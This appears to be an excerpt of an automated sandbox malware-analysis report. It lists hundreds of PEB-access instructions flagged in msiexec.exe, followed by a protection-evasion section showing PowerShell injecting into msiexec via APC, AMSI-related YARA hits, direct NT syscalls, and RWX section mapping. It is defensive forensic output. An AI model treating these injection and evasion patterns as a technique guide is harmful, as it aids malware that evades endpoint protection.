          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2487E5E7 mov eax, dword ptr fs:[00000030h]11_2_2487E5E7
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2487E5E7 mov eax, dword ptr fs:[00000030h]11_2_2487E5E7
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2487E5E7 mov eax, dword ptr fs:[00000030h]11_2_2487E5E7
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2487E5E7 mov eax, dword ptr fs:[00000030h]11_2_2487E5E7
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2488C5ED mov eax, dword ptr fs:[00000030h]11_2_2488C5ED
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2488C5ED mov eax, dword ptr fs:[00000030h]11_2_2488C5ED
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248525E0 mov eax, dword ptr fs:[00000030h]11_2_248525E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248715F4 mov eax, dword ptr fs:[00000030h]11_2_248715F4
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248715F4 mov eax, dword ptr fs:[00000030h]11_2_248715F4
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248715F4 mov eax, dword ptr fs:[00000030h]11_2_248715F4
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248715F4 mov eax, dword ptr fs:[00000030h]11_2_248715F4
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248715F4 mov eax, dword ptr fs:[00000030h]11_2_248715F4
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248715F4 mov eax, dword ptr fs:[00000030h]11_2_248715F4
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_24887505 mov eax, dword ptr fs:[00000030h]11_2_24887505
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_24887505 mov ecx, dword ptr fs:[00000030h]11_2_24887505
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248E6500 mov eax, dword ptr fs:[00000030h]11_2_248E6500
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_24924500 mov eax, dword ptr fs:[00000030h]11_2_24924500
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_24924500 mov eax, dword ptr fs:[00000030h]11_2_24924500
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_24924500 mov eax, dword ptr fs:[00000030h]11_2_24924500
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_24924500 mov eax, dword ptr fs:[00000030h]11_2_24924500
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_24924500 mov eax, dword ptr fs:[00000030h]11_2_24924500
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_24924500 mov eax, dword ptr fs:[00000030h]11_2_24924500
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_24924500 mov eax, dword ptr fs:[00000030h]11_2_24924500
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_24925537 mov eax, dword ptr fs:[00000030h]11_2_24925537
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248FF525 mov eax, dword ptr fs:[00000030h]11_2_248FF525
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248FF525 mov eax, dword ptr fs:[00000030h]11_2_248FF525
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248FF525 mov eax, dword ptr fs:[00000030h]11_2_248FF525
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248FF525 mov eax, dword ptr fs:[00000030h]11_2_248FF525
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248FF525 mov eax, dword ptr fs:[00000030h]11_2_248FF525
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248FF525 mov eax, dword ptr fs:[00000030h]11_2_248FF525
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248FF525 mov eax, dword ptr fs:[00000030h]11_2_248FF525
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2485D534 mov eax, dword ptr fs:[00000030h]11_2_2485D534
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2485D534 mov eax, dword ptr fs:[00000030h]11_2_2485D534
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2485D534 mov eax, dword ptr fs:[00000030h]11_2_2485D534
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2485D534 mov eax, dword ptr fs:[00000030h]11_2_2485D534
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2485D534 mov eax, dword ptr fs:[00000030h]11_2_2485D534
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2485D534 mov eax, dword ptr fs:[00000030h]11_2_2485D534
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_24860535 mov eax, dword ptr fs:[00000030h]11_2_24860535
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_24860535 mov eax, dword ptr fs:[00000030h]11_2_24860535
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_24860535 mov eax, dword ptr fs:[00000030h]11_2_24860535
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_24860535 mov eax, dword ptr fs:[00000030h]11_2_24860535
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_24860535 mov eax, dword ptr fs:[00000030h]11_2_24860535
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_24860535 mov eax, dword ptr fs:[00000030h]11_2_24860535
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2488D530 mov eax, dword ptr fs:[00000030h]11_2_2488D530
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2488D530 mov eax, dword ptr fs:[00000030h]11_2_2488D530
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2487E53E mov eax, dword ptr fs:[00000030h]11_2_2487E53E
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2487E53E mov eax, dword ptr fs:[00000030h]11_2_2487E53E
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2487E53E mov eax, dword ptr fs:[00000030h]11_2_2487E53E
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2487E53E mov eax, dword ptr fs:[00000030h]11_2_2487E53E
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2487E53E mov eax, dword ptr fs:[00000030h]11_2_2487E53E
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2490B52F mov eax, dword ptr fs:[00000030h]11_2_2490B52F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_24858550 mov eax, dword ptr fs:[00000030h]11_2_24858550
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_24858550 mov eax, dword ptr fs:[00000030h]11_2_24858550
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2488656A mov eax, dword ptr fs:[00000030h]11_2_2488656A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2488656A mov eax, dword ptr fs:[00000030h]11_2_2488656A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2488656A mov eax, dword ptr fs:[00000030h]11_2_2488656A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2484B562 mov eax, dword ptr fs:[00000030h]11_2_2484B562
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2488B570 mov eax, dword ptr fs:[00000030h]11_2_2488B570
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2488B570 mov eax, dword ptr fs:[00000030h]11_2_2488B570
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248D368C mov eax, dword ptr fs:[00000030h]11_2_248D368C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248D368C mov eax, dword ptr fs:[00000030h]11_2_248D368C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248D368C mov eax, dword ptr fs:[00000030h]11_2_248D368C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248D368C mov eax, dword ptr fs:[00000030h]11_2_248D368C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_24854690 mov eax, dword ptr fs:[00000030h]11_2_24854690
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_24854690 mov eax, dword ptr fs:[00000030h]11_2_24854690
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2484D6AA mov eax, dword ptr fs:[00000030h]11_2_2484D6AA
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2484D6AA mov eax, dword ptr fs:[00000030h]11_2_2484D6AA
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2488C6A6 mov eax, dword ptr fs:[00000030h]11_2_2488C6A6
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248476B2 mov eax, dword ptr fs:[00000030h]11_2_248476B2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248476B2 mov eax, dword ptr fs:[00000030h]11_2_248476B2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248476B2 mov eax, dword ptr fs:[00000030h]11_2_248476B2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248866B0 mov eax, dword ptr fs:[00000030h]11_2_248866B0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2485B6C0 mov eax, dword ptr fs:[00000030h]11_2_2485B6C0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2485B6C0 mov eax, dword ptr fs:[00000030h]11_2_2485B6C0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2485B6C0 mov eax, dword ptr fs:[00000030h]11_2_2485B6C0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2485B6C0 mov eax, dword ptr fs:[00000030h]11_2_2485B6C0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2485B6C0 mov eax, dword ptr fs:[00000030h]11_2_2485B6C0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2485B6C0 mov eax, dword ptr fs:[00000030h]11_2_2485B6C0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248816CF mov eax, dword ptr fs:[00000030h]11_2_248816CF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2488A6C7 mov ebx, dword ptr fs:[00000030h]11_2_2488A6C7
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2488A6C7 mov eax, dword ptr fs:[00000030h]11_2_2488A6C7
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2490F6C7 mov eax, dword ptr fs:[00000030h]11_2_2490F6C7
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_249116CC mov eax, dword ptr fs:[00000030h]11_2_249116CC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_249116CC mov eax, dword ptr fs:[00000030h]11_2_249116CC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_249116CC mov eax, dword ptr fs:[00000030h]11_2_249116CC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_249116CC mov eax, dword ptr fs:[00000030h]11_2_249116CC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2490D6F0 mov eax, dword ptr fs:[00000030h]11_2_2490D6F0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248E36EE mov eax, dword ptr fs:[00000030h]11_2_248E36EE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248E36EE mov eax, dword ptr fs:[00000030h]11_2_248E36EE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248E36EE mov eax, dword ptr fs:[00000030h]11_2_248E36EE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248E36EE mov eax, dword ptr fs:[00000030h]11_2_248E36EE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248E36EE mov eax, dword ptr fs:[00000030h]11_2_248E36EE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248E36EE mov eax, dword ptr fs:[00000030h]11_2_248E36EE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2487D6E0 mov eax, dword ptr fs:[00000030h]11_2_2487D6E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2487D6E0 mov eax, dword ptr fs:[00000030h]11_2_2487D6E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248D06F1 mov eax, dword ptr fs:[00000030h]11_2_248D06F1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248D06F1 mov eax, dword ptr fs:[00000030h]11_2_248D06F1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248CE6F2 mov eax, dword ptr fs:[00000030h]11_2_248CE6F2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248CE6F2 mov eax, dword ptr fs:[00000030h]11_2_248CE6F2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248CE6F2 mov eax, dword ptr fs:[00000030h]11_2_248CE6F2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248CE6F2 mov eax, dword ptr fs:[00000030h]11_2_248CE6F2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248CE609 mov eax, dword ptr fs:[00000030h]11_2_248CE609
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2488F603 mov eax, dword ptr fs:[00000030h]11_2_2488F603
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2486260B mov eax, dword ptr fs:[00000030h]11_2_2486260B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2486260B mov eax, dword ptr fs:[00000030h]11_2_2486260B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2486260B mov eax, dword ptr fs:[00000030h]11_2_2486260B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2486260B mov eax, dword ptr fs:[00000030h]11_2_2486260B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2486260B mov eax, dword ptr fs:[00000030h]11_2_2486260B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2486260B mov eax, dword ptr fs:[00000030h]11_2_2486260B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2486260B mov eax, dword ptr fs:[00000030h]11_2_2486260B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_24881607 mov eax, dword ptr fs:[00000030h]11_2_24881607
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_24892619 mov eax, dword ptr fs:[00000030h]11_2_24892619
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_24853616 mov eax, dword ptr fs:[00000030h]11_2_24853616
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_24853616 mov eax, dword ptr fs:[00000030h]11_2_24853616
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2486E627 mov eax, dword ptr fs:[00000030h]11_2_2486E627
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2484F626 mov eax, dword ptr fs:[00000030h]11_2_2484F626
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2484F626 mov eax, dword ptr fs:[00000030h]11_2_2484F626
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2484F626 mov eax, dword ptr fs:[00000030h]11_2_2484F626
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2484F626 mov eax, dword ptr fs:[00000030h]11_2_2484F626
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2484F626 mov eax, dword ptr fs:[00000030h]11_2_2484F626
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2484F626 mov eax, dword ptr fs:[00000030h]11_2_2484F626
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2484F626 mov eax, dword ptr fs:[00000030h]11_2_2484F626
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2484F626 mov eax, dword ptr fs:[00000030h]11_2_2484F626
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2484F626 mov eax, dword ptr fs:[00000030h]11_2_2484F626
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_24925636 mov eax, dword ptr fs:[00000030h]11_2_24925636
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_24886620 mov eax, dword ptr fs:[00000030h]11_2_24886620
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_24888620 mov eax, dword ptr fs:[00000030h]11_2_24888620
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2485262C mov eax, dword ptr fs:[00000030h]11_2_2485262C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2486C640 mov eax, dword ptr fs:[00000030h]11_2_2486C640
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2488A660 mov eax, dword ptr fs:[00000030h]11_2_2488A660
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2488A660 mov eax, dword ptr fs:[00000030h]11_2_2488A660
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_24889660 mov eax, dword ptr fs:[00000030h]11_2_24889660
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_24889660 mov eax, dword ptr fs:[00000030h]11_2_24889660
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_24882674 mov eax, dword ptr fs:[00000030h]11_2_24882674
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2491866E mov eax, dword ptr fs:[00000030h]11_2_2491866E
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2491866E mov eax, dword ptr fs:[00000030h]11_2_2491866E
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2490F78A mov eax, dword ptr fs:[00000030h]11_2_2490F78A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248DF7AF mov eax, dword ptr fs:[00000030h]11_2_248DF7AF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248DF7AF mov eax, dword ptr fs:[00000030h]11_2_248DF7AF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248DF7AF mov eax, dword ptr fs:[00000030h]11_2_248DF7AF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248DF7AF mov eax, dword ptr fs:[00000030h]11_2_248DF7AF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248DF7AF mov eax, dword ptr fs:[00000030h]11_2_248DF7AF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_249237B6 mov eax, dword ptr fs:[00000030h]11_2_249237B6
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248D97A9 mov eax, dword ptr fs:[00000030h]11_2_248D97A9
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248507AF mov eax, dword ptr fs:[00000030h]11_2_248507AF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2487D7B0 mov eax, dword ptr fs:[00000030h]11_2_2487D7B0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2484F7BA mov eax, dword ptr fs:[00000030h]11_2_2484F7BA
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2484F7BA mov eax, dword ptr fs:[00000030h]11_2_2484F7BA
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2484F7BA mov eax, dword ptr fs:[00000030h]11_2_2484F7BA
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2484F7BA mov eax, dword ptr fs:[00000030h]11_2_2484F7BA
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2484F7BA mov eax, dword ptr fs:[00000030h]11_2_2484F7BA
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2484F7BA mov eax, dword ptr fs:[00000030h]11_2_2484F7BA
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2484F7BA mov eax, dword ptr fs:[00000030h]11_2_2484F7BA
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2484F7BA mov eax, dword ptr fs:[00000030h]11_2_2484F7BA
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2484F7BA mov eax, dword ptr fs:[00000030h]11_2_2484F7BA
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_2485C7C0 mov eax, dword ptr fs:[00000030h]11_2_2485C7C0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248557C0 mov eax, dword ptr fs:[00000030h]11_2_248557C0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_248557C0 mov eax, dword ptr fs:[00000030h]11_2_248557C0

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe
          Source: Yara match; File source: amsi64_1068.amsi.csv, type: OTHER
          Source: Yara match; File source: Process Memory Space: powershell.exe PID: 1068, type: MEMORYSTR
          Source: Yara match; File source: Process Memory Space: powershell.exe PID: 5812, type: MEMORYSTR
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exe; NtWriteVirtualMemory: Direct from: 0x76F0490C
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exe; NtAllocateVirtualMemory: Direct from: 0x76F03C9C
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exe; NtClose: Direct from: 0x76F02B6C
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exe; NtReadVirtualMemory: Direct from: 0x76F02E8C
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exe; NtCreateKey: Direct from: 0x76F02C6C
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exe; NtSetInformationThread: Direct from: 0x76F02B4C
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exe; NtQueryAttributesFile: Direct from: 0x76F02E6C
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exe; NtAllocateVirtualMemory: Direct from: 0x76F048EC
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exe; NtQuerySystemInformation: Direct from: 0x76F048CC
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exe; NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exe; NtOpenSection: Direct from: 0x76F02E0C
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exe; NtSetInformationThread: Direct from: 0x76EF63F9
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exe; NtDeviceIoControlFile: Direct from: 0x76F02AEC
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exe; NtAllocateVirtualMemory: Direct from: 0x76F02BEC
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exe; NtCreateFile: Direct from: 0x76F02FEC
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exe; NtOpenFile: Direct from: 0x76F02DCC
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exe; NtQueryInformationToken: Direct from: 0x76F02CAC
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exe; NtProtectVirtualMemory: Direct from: 0x76EF7B2E
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exe; NtOpenKeyEx: Direct from: 0x76F02B9C
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exe; NtProtectVirtualMemory: Direct from: 0x76F02F9C
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exe; NtSetInformationProcess: Direct from: 0x76F02C5C
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exe; NtNotifyChangeKey: Direct from: 0x76F03C2C
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exe; NtCreateMutant: Direct from: 0x76F035CC
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exe; NtWriteVirtualMemory: Direct from: 0x76F02E3C
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exe; NtMapViewOfSection: Direct from: 0x76F02D1C
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exe; NtResumeThread: Direct from: 0x76F036AC
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exe; NtAllocateVirtualMemory: Direct from: 0x76F02BFC
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exe; NtReadFile: Direct from: 0x76F02ADC
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exe; NtQuerySystemInformation: Direct from: 0x76F02DFC
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exe; NtDelayExecution: Direct from: 0x76F02DDC
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exe; NtQueryInformationProcess: Direct from: 0x76F02C26
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exe; NtResumeThread: Direct from: 0x76F02FBC
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exe; NtCreateUserProcess: Direct from: 0x76F0371C
          Source: C:\Windows\SysWOW64\msiexec.exe; Section loaded: NULL target: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exe protection: execute and read and write
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exe; Section loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
